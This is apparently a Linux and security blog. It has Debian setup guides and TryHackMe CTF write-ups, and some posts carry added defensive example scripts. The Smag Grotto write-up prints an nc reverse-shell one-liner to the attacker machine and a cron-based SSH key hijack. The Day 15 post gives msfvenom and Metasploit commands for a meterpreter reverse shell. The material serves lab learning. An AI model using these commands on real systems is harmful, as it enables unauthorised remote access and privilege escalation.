Tuesday, October 22, 2024

How to Install PostgreSQL on Debian 12: A Step-by-Step Guide

PostgreSQL, commonly known as Postgres, is a powerful, open-source relational database management system renowned for its advanced features and reliability. In this step-by-step tutorial, we will guide you through installing PostgreSQL on a Debian 12 system (Debian 12 ships PostgreSQL 15 in its own repositories, so no third-party package source is needed).

Step 1: Update the System

Start by making sure your Debian 12 system is up to date. Open a terminal and run:

sudo apt update
sudo apt upgrade

The first command refreshes the package lists; the second upgrades the packages already installed (it asks for confirmation before changing anything).

Step 2: Install PostgreSQL

To install PostgreSQL on Debian 12, use the following command:

sudo apt install postgresql postgresql-contrib

This installs the PostgreSQL server (version 15 on Debian 12) together with the contrib package, which provides additional extensions and utilities. The package also creates a default cluster named main, owned by the unprivileged postgres system user.

Step 3: Start and Enable PostgreSQL

On Debian the package enables and starts the service as part of installation, so nothing more is needed.

To confirm it is enabled at boot (or to re-enable it), use:

sudo systemctl enable postgresql

To check the status of the PostgreSQL service, use:

sudo systemctl status postgresql

Note that postgresql.service is only an umbrella unit; the cluster itself runs as postgresql@15-main.service, and pg_lsclusters lists every cluster with its version, port and status.

Step 4: Create a PostgreSQL User and Database

Let's create a new PostgreSQL role and a database owned by it.

Replace your_user and your_database with your preferred values:

sudo -u postgres createuser your_user
sudo -u postgres createdb -O your_user your_database

createuser creates a login role with no password and no special privileges. With Debian's default pg_hba.conf, local connections over the Unix socket use peer authentication (the role name must match the Linux user running psql), while connections to 127.0.0.1 use scram-sha-256 passwords; add -P to createuser to be prompted for a password if the application will connect over TCP.

To access the PostgreSQL command-line tool, psql, use the following command (this connects as the postgres superuser):

sudo -u postgres psql -d your_database

Once in the psql prompt, execute the following SQL to create a basic table:

CREATE TABLE example (
    id serial PRIMARY KEY,
    name VARCHAR(100),
    age INT
);

Because you are connected as postgres, the table is owned by postgres; run ALTER TABLE example OWNER TO your_user; if your_user should own it, or connect as your_user and create it there.

Step 5: Managing the PostgreSQL Service

To manage the PostgreSQL service on Debian 12, you can use the following commands:

  • Start PostgreSQL service:
    sudo systemctl start postgresql
  • Stop PostgreSQL service:
    sudo systemctl stop postgresql
  • Restart PostgreSQL service:
    sudo systemctl restart postgresql
  • Reload configuration (postgresql.conf, pg_hba.conf) without dropping client connections:
    sudo systemctl reload postgresql
  • Check PostgreSQL service status:
    sudo systemctl status postgresql
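The steps above leave you with a passwordless role and a table owned by the superuser. The script below is an added example, not part of the original guide: it generates the SQL for a login role with a SCRAM password and only the privileges an application needs, quoting every identifier and literal so names taken from shell variables cannot break out of the DDL. The names are assumptions for the example: role app_user, database app_db, the example table from Step 4, and a password read from the APP_DB_PASSWORD environment variable.

```shell
#!/bin/sh
# Added example, not part of the original guide: replace the bare
# `createuser` in Step 4 with a login role that has a SCRAM password and
# only the privileges the application needs. Names below are assumptions:
# role app_user, database app_db, table example (from Step 4), password
# read from the APP_DB_PASSWORD environment variable.

# Double-quote an SQL identifier, doubling embedded quotes, so a name
# taken from a shell variable cannot break out of the generated DDL.
pg_ident() {
    printf '"%s"\n' "$(printf '%s' "$1" | sed 's/"/""/g')"
}

# Single-quote an SQL string literal, doubling embedded single quotes.
pg_literal() {
    printf "'%s'\n" "$(printf '%s' "$1" | sed "s/'/''/g")"
}

# Emit the SQL that creates the role and scopes its rights to one table:
# no superuser/createdb/createrole, PUBLIC stripped from the database and
# schema, and only DML on the one table.
role_setup_sql() {
    role=$(pg_ident "$1"); db=$(pg_ident "$2"); pw=$(pg_literal "$3"); tbl=$(pg_ident "$4")
    cat <<EOF
CREATE ROLE $role LOGIN PASSWORD $pw NOSUPERUSER NOCREATEDB NOCREATEROLE;
REVOKE ALL ON DATABASE $db FROM PUBLIC;
GRANT CONNECT ON DATABASE $db TO $role;
REVOKE CREATE ON SCHEMA public FROM PUBLIC;
GRANT USAGE ON SCHEMA public TO $role;
GRANT SELECT, INSERT, UPDATE, DELETE ON $tbl TO $role;
EOF
}

# Dry run by default; PG_APPLY=1 pipes the SQL into the cluster as the
# postgres OS user (peer authentication), stopping at the first error.
if [ "${PG_APPLY:-0}" = 1 ]; then
    role_setup_sql app_user app_db "$APP_DB_PASSWORD" example |
        sudo -u postgres psql -v ON_ERROR_STOP=1 -d app_db
else
    role_setup_sql app_user app_db "${APP_DB_PASSWORD:-change-me}" example
fi
```

PostgreSQL 15 hashes the password with scram-sha-256 by default, and the password travels over psql's stdin rather than the command line, so it does not show up in ps output (it will appear in the server log if log_statement is set to all, so keep that off while running this). Afterwards the application connects over TCP, which Debian's default pg_hba.conf authenticates by password: psql -h localhost -U app_user -d app_db.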

Congratulations! You have successfully installed PostgreSQL on your Debian 12 server, created a database, and learned how to perform basic management tasks.

PostgreSQL’s extensive feature set makes it a versatile choice for various data storage needs.

How to Install ifconfig on Debian

Do you see an "ifconfig: command not found" error on Debian? Here is my quick tutorial on how to install it on Debian.

I have made a fresh install of Debian 12 server on my VM, and when I wanted to check the IP of the VM I encountered the problem:

"The ifconfig package is not included by default in Debian since it is being phased out in favor of the ip command. The ip command now handles tasks such as modifying or displaying routing, network devices, interfaces, and tunnels."

If you still want to use the good old ifconfig command, you'll have to install it explicitly.

Installing the ifconfig command in Debian

ifconfig is not a package on its own. It comes with the net-tools package, which bundles a few other legacy networking tools (netstat, route, arp).

So to get ifconfig, you need to install the net-tools package like this:

sudo apt install net-tools

After installing it you can use the command:

ifconfig

However, I strongly advise you to start using the ip command. Sooner or later, net-tools will be completely deprecated and you won't be able to install it. The equivalents are ip -br address (addresses), ip link (interfaces) and ip route (routing table).

Sunday, August 11, 2024

File Permissions in Linux

1. chmod (Change Mode)

The chmod command modifies a file's permission bits, which control read (r), write (w), and execute (x) access for the owner (u), the group (g), and others (o). Here are the two ways to use chmod:

  • Symbolic Mode:

    • Syntax: chmod [ugoa][+-=][rwx] file, where + adds, - removes, and = sets exactly the listed permissions.
    • Example: To add write permission for the user, group, and others to a file named file1, use:
      chmod ugo+w file1
      Note that this leaves file1 world-writable, which is rarely what you want.

  • Numeric Mode:

    • The mode is written as three octal digits, each the sum of r=4, w=2, x=1:
      • First digit: User permissions
      • Second digit: Group permissions
      • Third digit: Others' permissions
    • An optional fourth, leading digit sets the special bits (setuid=4, setgid=2, sticky=1); setuid and setgid executables deserve a close look on any system you audit.
    • Example: To give read/write/execute permission to the user, read/execute permission to the group, and execute permission to others, use:
      chmod 751 file1
      

2. chown (Change Ownership)

The chown command changes the owner (and optionally the group) of a file. On Linux only root can change a file's owner; an ordinary user cannot give a file away to someone else. Syntax:

chown [owner][:group] [file]

Example: To change the owner of file1 to user2 (run as root or via sudo):

sudo chown user2 file1

3. chgrp (Change Group Ownership)

The chgrp command changes the group of a file. The file's owner can change it to any group they are a member of; root can set any group. Syntax:

chgrp [group] [file]

Example: To change the group of file1 to group2 (as the file's owner, provided you belong to group2):

chgrp group2 file1

Understanding these commands will empower you to manage permissions effectively. Happy learning!
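To see the two chmod forms side by side, here is an added example (not part of the original post) that applies the modes discussed above to a scratch file and reads each result back with stat. It assumes GNU coreutils (stat -c, mktemp); chown and chgrp appear only in a comment, since changing the owner needs root.

```shell
#!/bin/sh
# Added example, not part of the original post: apply the modes discussed
# above to a scratch file and read each result back with stat, so the
# numeric and symbolic forms can be compared side by side.
# Assumes GNU coreutils (stat -c, mktemp).

# Octal mode of a path, e.g. 751.
mode_of() { stat -c '%a' "$1"; }

# Scratch file with a known starting mode; prints its path.
make_file() {
    f=$(mktemp)
    chmod 600 "$f"              # owner rw, nobody else
    printf '%s\n' "$f"
}

# Numeric mode: 7 = rwx (owner), 5 = r-x (group), 1 = --x (others).
set_numeric() { chmod 751 "$1"; mode_of "$1"; }

# Symbolic '+' adds to what is already there: 751 plus write for
# everyone is 773, which leaves the file world-writable.
add_write_all() { chmod ugo+w "$1"; mode_of "$1"; }

# Symbolic '=' sets exactly what is listed. For a private key or a
# credentials file this is the least-privilege mode: 600.
lock_down() { chmod u=rw,go= "$1"; mode_of "$1"; }

f=$(make_file)
echo "start:     $(mode_of "$f")"
echo "chmod 751: $(set_numeric "$f")"
echo "ugo+w:     $(add_write_all "$f")"
echo "u=rw,go=:  $(lock_down "$f")"
# Ownership changes need root:  sudo chown user2 "$f"   or   sudo chown user2:group2 "$f"
rm -f "$f"
```

Reading the mode back after every change is the habit worth keeping: a deployment script that runs chmod ugo+w on a config file to "fix" a permission error has just made it writable by every account on the host, and stat -c '%a %U %G' shows that immediately.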

Day 2: “Linux Distributions Explained” - Discuss different distros and their use cases.

Linux is a family of free and open-source operating systems based on the Linux kernel. These operating systems are known as Linux distributions or, as users call them, distros. Examples include Debian, Ubuntu, Fedora, CentOS, Gentoo, Arch Linux, and others. Each distro has its own features, package management system, and community.

If you're new to Linux, it's essential to understand that Linux filesystems have a different structure than those found on Windows or macOS. Additionally, Linux-based systems rely heavily on the command line interface (CLI), where you interact with the system by typing commands. Becoming comfortable with the terminal is crucial for tasks like file manipulation, package installation, and user management.

1. Ubuntu - ubuntu.com
Features:

  • Based on Debian, Ubuntu emphasizes ease of use and accessibility.
  • Regular LTS (Long-Term Support) releases (e.g., 20.04, 22.04) provide stability.
  • Extensive community support through forums, documentation, and Ask Ubuntu.
  • Variants include Ubuntu Desktop, Ubuntu Server, and flavors like Kubuntu (KDE), Xubuntu (Xfce), and Lubuntu (LXQt).
Use Cases:
  • General-purpose desktops for both beginners and experienced users.
  • Servers, especially with Ubuntu Server.
  • Cloud deployments (e.g., on AWS, Azure, or Google Cloud).
Installation: Graphical installer (Ubiquity) for desktop editions; text-based installer (Subiquity) for server editions.

2. Fedora - fedoraproject.org
Features:

  • Sponsored by Red Hat, Fedora serves as the upstream testing ground for RHEL.
  • Frequent updates, embracing bleeding-edge technologies.
  • Focus on open-source software and community-driven development.
  • Workstation edition tailored for developers and enthusiasts.
Use Cases:
  • Developers who want the latest software.
  • Enthusiasts exploring new features.
  • Fedora Server for lightweight server deployments.
Installation:
  • Graphical Anaconda installer with customization options.

3. CentOS - centos.org
Features:

  • CentOS Linux was a rebuild of RHEL (Red Hat Enterprise Linux); its successor, CentOS Stream, sits just upstream of RHEL instead.
  • Stable, with long support cycles.
  • Ideal for servers, data centers, and enterprise environments.
  • Minimal changes compared to RHEL.
Use Cases:
  • Enterprise servers where stability is critical.
  • Hosting web applications, databases, and services.
Installation:
  • Anaconda installer (graphical or text mode), the same as RHEL.

Important! CentOS Linux 7 reached end of life (EOL) on June 30, 2024. Official support and updates from the CentOS project have ceased: no further security patches, bug fixes, or software upgrades will be released for it, so every CentOS 7 host still on a network is accumulating unpatched vulnerabilities. There is a supported path, though: you can convert CentOS Linux servers in place into Red Hat Enterprise Linux (RHEL) servers, and Red Hat's support and consulting teams can help with the migration. If you are using CentOS, plan your transition to a supported platform to ensure ongoing security and stability.

4. Arch Linux - archlinux.org
Features:

  • Lightweight, minimalistic, and highly customizable.
  • Rolling release model: no major version upgrades.
  • DIY approach: you build your system from scratch.
  • AUR (Arch User Repository) for additional, user-contributed packages; these are not reviewed by Arch, so read the PKGBUILD before building one.
Use Cases:
  • Advanced users who enjoy fine-tuning their system.
  • Minimal installations for specific purposes.
  • Learning about Linux internals.
Installation:
  • Command-line install from the live ISO using arch-install-scripts (pacstrap, genfstab, arch-chroot); the archinstall guided installer is also on the ISO.
  • Requires manual configuration.

5. Debian - debian.org
Features:

  • One of the oldest surviving distros (founded in 1993), known for stability.
  • Large package repository.
  • Used as the base for many other distros, including Ubuntu.
  • Supports multiple architectures.
Use Cases:
  • Servers (Debian Stable).
  • Workstations (Debian Testing or Unstable).
  • Embedded systems.
Installation:
  • Graphical or text-based installer (Debian Installer).

If you would like to find out more about Linux distributions, visit DistroWatch, a comprehensive website that provides news, rankings, and general information about Linux distributions and other free/open-source Unix-like operating systems. It is a valuable resource for users choosing a suitable Linux distro and also raises awareness of smaller distributions.

Tuesday, October 31, 2023

Debian Server 12 - adding user to sudoers

sudo is a command-line utility that allows trusted users to run commands as another user, by default root. This tutorial shows two ways to grant sudo privileges to a user: a rule in the sudoers file, or membership of the sudo group. Either one is enough; you do not need both.

  1. On my VM Debian Server I had to install the sudo utility first, so as root I ran:
    apt install sudo
  2. First way: add the user to the sudoers file. As root, run visudo (it locks the file and checks the syntax before saving, so a typo cannot lock you out of sudo) and add at the end of the file:
    username ALL=(ALL) NOPASSWD:ALL
    NOPASSWD: means the user is never asked for their password, so anyone who gets into that account has root with no further check. Unless the account exists for unattended automation, drop it and use username ALL=(ALL:ALL) ALL instead.
  3. Second way: add the user to the sudo group, again as root:
    usermod -aG sudo username
    Debian's default sudoers already contains the rule %sudo ALL=(ALL:ALL) ALL, which is why group membership is enough. The user has to log out and back in for the new group to take effect.
  4. Now check that the user can use sudo: log in as that user and run sudo -l to list what they are allowed to run, then try a command such as sudo whoami, which should print root.
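Once rules like the one in step 2 exist, the question on any host you inherit is who can become root and whether they need a password to do it. The script below is an added example, not part of the original post: it audits sudoers-style text for NOPASSWD rules and for principals granted unrestricted root. It reads whatever file you point it at (a copy of /etc/sudoers or an /etc/sudoers.d fragment) and, when run stand-alone, a constructed sample written to a temporary file.

```shell
#!/bin/sh
# Added example, not part of the original post: audit sudoers-style text
# for rules that hand out root, especially without a password. It reads a
# file you point it at (a copy of /etc/sudoers, an /etc/sudoers.d fragment)
# and, when run stand-alone, a constructed sample written to a temp file.

# Non-comment, non-blank lines of a sudoers file.
rules() { grep -vE '^[[:space:]]*(#|$)' "$1" || true; }

# Rules that skip the password prompt.
nopasswd_rules() { rules "$1" | grep 'NOPASSWD' || true; }

# Count of principals allowed to run anything as anyone:
#   <who> ALL=(ALL) ALL   or   <who> ALL=(ALL:ALL) [NOPASSWD:] ALL
full_root_count() {
    rules "$1" | grep -Ec '^[^[:space:]]+[[:space:]]+ALL[[:space:]]*=[[:space:]]*\(ALL(:ALL)?\)[[:space:]]+(NOPASSWD:[[:space:]]*)?ALL[[:space:]]*$' || true
}

# Constructed sample (not a real sudoers file); prints its path.
make_sample() {
    f=$(mktemp)
    cat >"$f" <<'EOF'
# constructed sample
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
deploy  ALL=(ALL) NOPASSWD:ALL
backup  ALL=(root) NOPASSWD: /usr/bin/rsync
EOF
    printf '%s\n' "$f"
}

s=$(make_sample)
echo "rules without a password prompt:"
nopasswd_rules "$s"
echo "principals with unrestricted root: $(full_root_count "$s")"
rm -f "$s"
```

On the sample, the backup line is the acceptable shape of NOPASSWD (one fixed command), while deploy is the shape from step 2 and gets reported under both checks. Run it as sudo sh audit.sh /etc/sudoers on a real host, and remember that visudo -c validates syntax only; it says nothing about what the rules grant.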

Thursday, December 29, 2022

TryHackMe - Smag Grotto - writeup

Smag Grotto is one of the easy CTF rooms on TryHackMe.com. Here are the steps that led me to the solution and to both the user and root flags. Before you start you need to boot up the VM and the AttackBox machine.
  1. First I ran an nmap scan:
    nmap -sC VM_IP
    The scan shows only 2 open ports: ssh and http. Opening the page by IP didn't give me much more info.
  2. I then enumerated the web server with gobuster:
    gobuster dir -t 40 -u VM_IP -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
    gobuster finds a /mail folder.
  3. In /mail we find email correspondence with a .pcap trace file attached.
  4. I downloaded the pcap file and opened it in Wireshark. In the trace I found the new domain where the site is hosted, and also a username and password for the login.
  5. To reach the new domain I added VM_IP and the domain from the .pcap file to /etc/hosts on the AttackBox.
  6. I entered the domain in the browser, found login.php and logged in with the credentials from the .pcap file.
  7. After login you land on a page where you can enter commands. I had to look around the internet for a hint on what to do here: we start an nc listener on the AttackBox and launch a reverse shell from the command field. The listener has to be running before the shell connects, so on the AttackBox start it first:
    nc -lvnp 1338
    then in the command field run:
    rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc Attackbox_IP 1338 >/tmp/f
  8. Within a second I had shell access as www-data. I then checked the cron jobs and saw a job that copies the public key /opt/.backups/jake_id_rsa.pub.backup into jake's authorized_keys. We can abuse this by replacing that file with our own public key.
  9. On the AttackBox we create a key pair:
    ssh-keygen -t rsa -P '' -f jakekey
    then we open jakekey.pub, copy its contents and write them to the target with:
    echo "public_key_we_created" > /opt/.backups/jake_id_rsa.pub.backup
    The file must sit in /opt/.backups/ under exactly that name, otherwise the cron job will not pick it up. Give the job time to run before trying to log in.
  10. Next I logged in with the key. I had forgotten the exact syntax for using an SSH key, so I had to look it up:
    ssh -i jakekey jake@development.smag.thm
    Logged in as jake, we can now search for the user flag:
    find / -type f -name user.txt 2>/dev/null
  11. Open user.txt and copy the flag.
  12. Now only the root flag was missing, and that file is readable only by root. I checked what jake can run with sudo:
    sudo -l
    The output shows that jake can run apt-get as root via sudo.
  13. We head over to GTFOBins and look up apt-get to find the invocation that gives a root shell through it.
  14. The root flag is at:
    cat /root/root.txt
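The pivot in this room is the cron job that copies a file we control into authorized_keys. The script below is an added example, not part of the original write-up: it is the triage behind that cron-job check, listing the jobs in a crontab that write into an authorized_keys file and reporting whether the file they copy from is one we can overwrite (or create, if it is missing). The crontab lines and paths are constructed for this example; on a target you would feed it /etc/crontab, /etc/cron.d/* and the output of crontab -l.

```shell
#!/bin/sh
# Added example, not part of the original write-up: the triage behind the
# cron-job check above. Given crontab text, list the jobs that write into
# an authorized_keys file and say whether the file they copy from is one
# we can control. The crontab lines and paths are constructed for this
# example; on a target you would feed it /etc/crontab, /etc/cron.d/* and
# the output of crontab -l.

# Cron lines (comments dropped) that touch authorized_keys.
authkey_jobs() {
    grep -vE '^[[:space:]]*(#|$)' "$1" | grep 'authorized_keys' || true
}

# Source operand of a `cp SRC DST` command embedded in one cron line.
job_source() {
    printf '%s\n' "$1" |
        sed -n 's/.*[[:space:]]cp[[:space:]]\{1,\}\([^[:space:]]\{1,\}\)[[:space:]].*/\1/p'
}

# "writable" if we can overwrite SRC, or create it because its directory
# is writable (a missing source is just as exploitable); else "readonly".
classify_source() {
    if [ -w "$1" ] || { [ ! -e "$1" ] && [ -w "$(dirname "$1")" ]; }; then
        echo writable
    else
        echo readonly
    fi
}

# Constructed stand-in for the room's layout; prints the directory.
make_sample() {
    d=$(mktemp -d)
    mkdir -p "$d/opt/.backups"
    : > "$d/opt/.backups/jake_id_rsa.pub.backup"
    cat > "$d/crontab" <<EOF
# constructed crontab, not the room's real one
*/1 * * * * root cp $d/opt/.backups/jake_id_rsa.pub.backup /home/jake/.ssh/authorized_keys
*/5 * * * * root tar czf /var/backups/www.tgz /var/www
EOF
    printf '%s\n' "$d"
}

d=$(make_sample)
authkey_jobs "$d/crontab" | while IFS= read -r job; do
    src=$(job_source "$job")
    echo "$src -> $(classify_source "$src")"
done
rm -rf "$d"
```

A "writable" result is exactly the condition the write-up exploits: the job runs as root, so whatever key lands in that file becomes a login for jake on the next tick. The same check, run as the defender, tells you which cron jobs copy from paths that unprivileged users can touch.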
I hope anyone who gets stuck finds it helpful
AudiTTRSi

Saturday, December 17, 2022

TryHackMe.com - Advent of Cyber 2022 - Day 17 - writeup

Advent of Cyber is now a regular seasonal room on TryHackMe. This is their 4th edition, again with an awesome story to follow through each day's assignment. Day 17 covers regular expressions.
  1. Question 1, Question 2: to answer the first two questions you can use the following regular expression (6 to 12 alphanumeric characters, anchored to the whole line):
    ^[a-zA-Z0-9]{6,12}$
  2. Question 3, Question 4: the following regular expression will get you the answers (anything@anything ending in .com; the dot before com is escaped so it matches a literal dot):
    ^.+@.+\.com$
  3. Question 5: a plain string is itself a regular expression, so searching for the username is enough:
    lewisham44
  4. Question 6: likewise:
    maxximax
  5. Question 7: the same email pattern as before:
    ^.+@.+\.com$
  6. Question 8, Question 9:
    ^http(s)?.{3}(www)?.+..+$
    Here .{3} stands in for :// and the two unescaped dots match any character, so this pattern is looser than it looks; it is enough for the task's input.
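To see what each of these patterns actually pins down, here is an added example (not part of the original write-up) that runs them over a constructed sample with grep -E and counts the matches, alongside a tightened URL pattern that spells out the :// and the dot.

```shell
#!/bin/sh
# Added example, not part of the original write-up: run the write-up's
# patterns over a constructed sample with grep -E and count the matches,
# so you can see what each piece of a pattern does (and does not) pin
# down. The sample lines are made up for this example.

# Constructed input: two valid usernames, two that are too short or too
# long, two email addresses, three URLs and one non-URL starting with http.
sample() {
    cat <<'EOF'
lewisham44
maxximax
a1
thisis13chars
bob@example.com
alice@example.co.uk
http://www.example.com
https://example.org/path
ftp://example.com
httpfoo.bar
EOF
}

# Number of sample lines matched by an extended regular expression.
count() { sample | grep -Ec "$1" || true; }

USERNAME='^[a-zA-Z0-9]{6,12}$'        # 6 to 12 alphanumerics, anchored to the whole line
EMAIL_COM='^.+@.+\.com$'               # something@something ending in a literal ".com"
URL_LOOSE='^http(s)?.{3}(www)?.+..+$'  # the write-up's pattern: .{3} stands in for "://", the two dots are unescaped
URL_STRICT='^https?://(www\.)?[^/]+\.[a-z]+(/.*)?$'  # same intent with "://" and the dot spelled out

echo "usernames (expect 2):       $(count "$USERNAME")"
echo ".com addresses (expect 1):  $(count "$EMAIL_COM")"
echo "URLs, loose (expect 3):     $(count "$URL_LOOSE")"
echo "URLs, strict (expect 2):    $(count "$URL_STRICT")"
```

The loose URL pattern also accepts httpfoo.bar, because .{3} matches any three characters, not just ://. That is harmless in a CTF with clean input, but in a log filter or a validation rule it is the difference between matching URLs and matching anything that begins with http.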
I hope anyone who gets stuck finds it helpful
AudiTTRSi

TryHackMe - ItsyBitsy - writeup

The ItsyBitsy room is the second room in the Security Information and Event Management module of the SOC Level 1 path on TryHackMe. Put your ELK knowledge together and investigate an incident. First you need to boot up the VM and the AttackBox, which takes a few minutes. Once the AttackBox is up, open Firefox and access Kibana.
  1. Question 1 - How many events were returned for the month of March 2022?
    Change the date range to March 2022 and the hit count answers the first question.
  2. Question 2 - What is the IP associated with the suspected user in the logs?
    The question is about the source_ip field. The logs show 2 IP addresses, so you must do a bit of work to find the right one.
  3. Question 3 - The user's machine used a legit windows binary to download a file from the C2 server. What is the name of the binary?
    Answering this question took me the longest, because I was either looking in the wrong place or looking at the right answer without realising it. Hint: look at the user_agent field ;)
  4. Question 4 - The infected machine connected with a famous filesharing site in this period, which also acts as a C2 server used by the malware authors to communicate. What is the name of the filesharing site?
    When we filter by the IP from Question 2 we can answer this one quickly, because there are only 2 logs from that source_ip.
  5. Question 5 - What is the full URL of the C2 to which the infected host is connected?
    Hostname + url field.
  6. Question 6 - A file was accessed on the filesharing site. What is the name of the file accessed?
    We can browse to the filesharing site using the URL from the previous question and find a file there.
  7. Question 7 - The file contains a secret code with the format THM{_____}.
    Open the file on the filesharing site and copy the flag.
I hope anyone who gets stuck finds it helpful
AudiTTRSi

Friday, December 16, 2022

TryHackMe.com - Advent of Cyber 2022 - Day 16 - writeup

Advent of Cyber is now a regular seasonal room on TryHackMe. This is their 4th edition, again with an awesome story to follow through each day's assignment. Today's task covers SQL injection (SQLi): attacker-controlled input is placed into an SQL statement through a web page field, so the database runs a query the developer never wrote. If this vulnerability exists, attackers will most likely try to dump all of the application's users and passwords from the database. Before you start solving the task you need to boot up the VM in the task and the AttackBox for accessing the page; it will take a minute or two. After that we can open the link to the developer page of the app we will try to fix and log in with the provided credentials.
  1. Question 1 - Fixing SQLi by Data Type Validation
    First we use the fix from the task description (checking that the input is of the expected type before it reaches the query) on the first and then the second query in elf.php; after saving and pressing run we get the first flag.
  2. Question 2 - Fixing SQLi Using Prepared Statements
    With the prepared statement described in the task we can quickly fix search_toys.php and get the second flag.
  3. Question 3
    To find the third flag we need to fix toy.php; we fix it the same way we fixed elf.php, with data type validation.
  4. Question 4
    For the 4th vulnerability and the fourth flag we fix login.php with a prepared statement, as we did for the second flag. Just make sure you bind $username and $password instead of $q.
I hope anyone who gets stuck finds it helpful
AudiTTRSi

TryHackMe.com - Advent of Cyber 2022 - Day 15 - writeup

Advent of Cyber is now a regular seasonal room on TryHackMe. This is their 4th edition, again with an awesome story to follow through each day's assignment. Here are my solutions for Day 15, if anyone gets stuck or needs a bit of help. Today's task addresses input validation of file upload functionality and unrestricted file upload vulnerabilities: if the upload handler does not check what it receives, a threat actor can upload an executable and get access to the server. First you need to boot up the VM and the AttackBox, since they take some time. All questions except Q3 can be answered by carefully reading the task description of the vulnerabilities and how to avoid them. For Q3 we need to create the payload; we get the command in the task description:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=AttackBox_IP LPORT="Listening port" -f exe -o cv-username.exe
It takes a minute to generate and is saved in the AttackBox's /root folder. Then run the second command to start the listener:
sudo msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_tcp; set LHOST AttackBox_IP; set LPORT 'listening port'; exploit"
After that we head to Firefox and upload the payload file created in the first step. Now we open the listener window and wait until the uploaded file is run on the server. When the connection is active we can move through the directories:
  1. pwd to check where we are
  2. cd ../..
  3. head to the HR Elf's Documents directory
  4. cat flag.txt
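The upload in this task succeeds because nothing checks what cv-username.exe is. The script below is an added example, not part of the original write-up: the server-side validation that would have rejected it. The client-supplied name is checked for path characters and double extensions, the extension against an allow-list, and the file's first bytes against the type the extension claims. The sample uploads are constructed here; the magic values (%PDF, PK, MZ) are the standard ones.

```shell
#!/bin/sh
# Added example, not part of the original write-up: the server-side
# validation that would have rejected the cv-username.exe upload. The
# client-supplied name is checked for path tricks and double extensions,
# the extension against an allow-list, and the file's first bytes
# against the type that extension claims. Sample files are constructed.

# Lower-cased extension of a name, or empty.
ext_of() {
    case $1 in
        *.*) printf '%s\n' "${1##*.}" | tr 'A-Z' 'a-z' ;;
        *)   printf '\n' ;;
    esac
}

# check_upload CLIENT_NAME TMP_PATH: prints the verdict, returns 0 to accept.
check_upload() {
    name=$1 path=$2
    case $name in
        */*|*\\*|*..*) echo "reject: path characters in name"; return 1 ;;
        *.*.*)         echo "reject: multiple extensions"; return 1 ;;   # blocks cv.pdf.exe (and my.cv.pdf; strict on purpose)
    esac
    ext=$(ext_of "$name")
    magic=$(head -c 4 "$path" | tr -d '\0')
    case $ext in
        pdf)  [ "$magic" = '%PDF' ] || { echo "reject: content is not a PDF"; return 1; } ;;
        docx) [ "$(head -c 2 "$path")" = 'PK' ] || { echo "reject: content is not a DOCX"; return 1; } ;;
        *)    echo "reject: extension '$ext' not allowed"; return 1 ;;
    esac
    echo "accept: $name"
}

# Constructed uploads; prints the directory holding them.
make_samples() {
    d=$(mktemp -d)
    printf '%%PDF-1.7\n%% constructed\n' > "$d/cv.pdf"
    printf 'MZ\220\000\003\000\000\000\004' > "$d/cv.exe"   # first bytes of a PE executable
    cp "$d/cv.exe" "$d/cv-disguised.pdf"                  # executable renamed to .pdf
    cp "$d/cv.exe" "$d/cv.pdf.exe"                        # double extension
    printf '%s\n' "$d"
}

d=$(make_samples)
for f in "$d"/*; do
    check_upload "$(basename "$f")" "$f" || true
done
check_upload '../../var/www/html/shell.php' "$d/cv.pdf" || true
rm -rf "$d"
```

Only cv.pdf is accepted; the renamed executable fails on content, the double extension and the traversal name fail before the file is even read. Two things the check deliberately does not rely on: the Content-Type header, which the client sets, and the extension alone, which is what let the payload through in the task.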
I hope anyone who gets stuck finds it helpful
AudiTTRSi

Wednesday, December 14, 2022

TryHackMe.com - Advent of Cyber 2022 - Day 14 - writeup

Advent of Cyber is now a regular seasonal room on TryHackMe. This is their 4th edition, again with an awesome story to follow through each day's assignment. Here are my solutions for Day 14, if anyone gets stuck or needs a bit of help. First you need to boot up the VM and the AttackBox, since they take some time. After both are up you can open the website on the provided IP and port 8080 and log in with the credentials from the task description. The application never checks that the profile you request belongs to the logged-in user (an insecure direct object reference, IDOR), so we can freely change the id in the web address and cycle through the registered users' profiles to find the answer to the first question.
For the second one we copy the profile picture's URL and change its id number: the profile images have the same vulnerability, so we can cycle through the pictures and find the one containing the flag, which is the answer to the second question. I hope anyone who gets stuck finds it helpful
AudiTTRSi
